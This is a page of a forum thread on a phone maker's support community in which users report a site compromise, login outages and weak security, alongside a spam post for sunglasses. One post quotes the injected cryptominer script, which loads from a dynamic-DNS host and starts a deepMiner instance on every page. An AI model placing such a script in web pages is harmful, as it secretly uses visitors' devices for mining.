1234Next

bander
administrator
11# 2018-1-6 10:34:49
hey friends, nice to see you here again! Hope you all have a great holiday. We have checked database, it's safe. And no data has been stolen or changed. Just problems on the front end.

gg_cqESG93
Honeycomb
12# 2018-1-6 13:14:18
Hackers for this forum?it sounds really funny!

fb_DKmbO38
Global moderators
13# 2018-1-7 18:56:09
The problem was, but with the android stopped without problems. with windows did not miss.

rebecca02
Donut
14# 2018-1-9 16:42:05
Important Factors to Think About While Selecting Folding Plastic Sunglasses:

Practicality: The sunglasses should cater to the needs of protecting eyes from UV.
Durability: The material and quality are important factors to think about; otherwise, the product won’t last for long.
Design: The design of plastic lens sunglasses  should stay with the fashion rather than granny style.
Price: It’s not always true that “the more expensive, the better”. You need a high quality product at reasonable and affordable price.
Packaging: A rigid packing case for the plastic sunglasses for women and men can protect them from damage or squish.

https://www.cfone.net

ChiLee
Froyo
15# 2018-1-19 22:28:29
Your forum has been hacked AGAIN!!!

Another crypto miner added to every page:

<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
<script>
                var uri = 'www';
                var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
                jqueryui.start();
</script>

Doogee - is your website security being done by your pet dog?? Whoever is in charge should be fired!

gg_APPUT59
Global moderators
16# 2018-1-28 08:41:17
ChiLee replied at 2018-1-19 22:28
Your forum has been hacked AGAIN!!!

Another crypto miner added to every page:

Will report that ASAP, I have a friend who is a web dev, maybe I'll ask bander to get him as a forum manager as well. Thanks.

midget
Froyo
17# 2018-1-29 15:54:21
hello,
je viens juste de pouvoir me connecter.... ça faisait 4 ou 5 jours que cela ne fonctionnait pas pour moi....
j'ai envoyé des mail à see@doogee.cc and support-service@doogee.cc mais sans réponse....

gg_cqESG93
Honeycomb
18# 2018-1-29 22:19:37
This happened again!I was unable to log in for past 1 week!today finally I am able to log in today.seems everything related to software is mishandled by doogee.it is same case with mobiles too.hardware is good but ur software sucks.

bolumstar
Honeycomb
19# 2018-1-30 06:15:02
It did took a while to resolve it. I thought I was blocked or something...
Always send an email to forum members.

fb_b266X25
Froyo
20# 2018-1-31 05:07:31
Taking into account the last months, I must say that I can only log in every third week or so. Moreover, I can only log in via a fake facebook account. Email registration does not work for me. I never get a confirmation email. And yes, I checked the spam folder.
1234Next
You have to log in before you can reply Login | Register now Sign in with facebook Sign in with google

Points Rules

International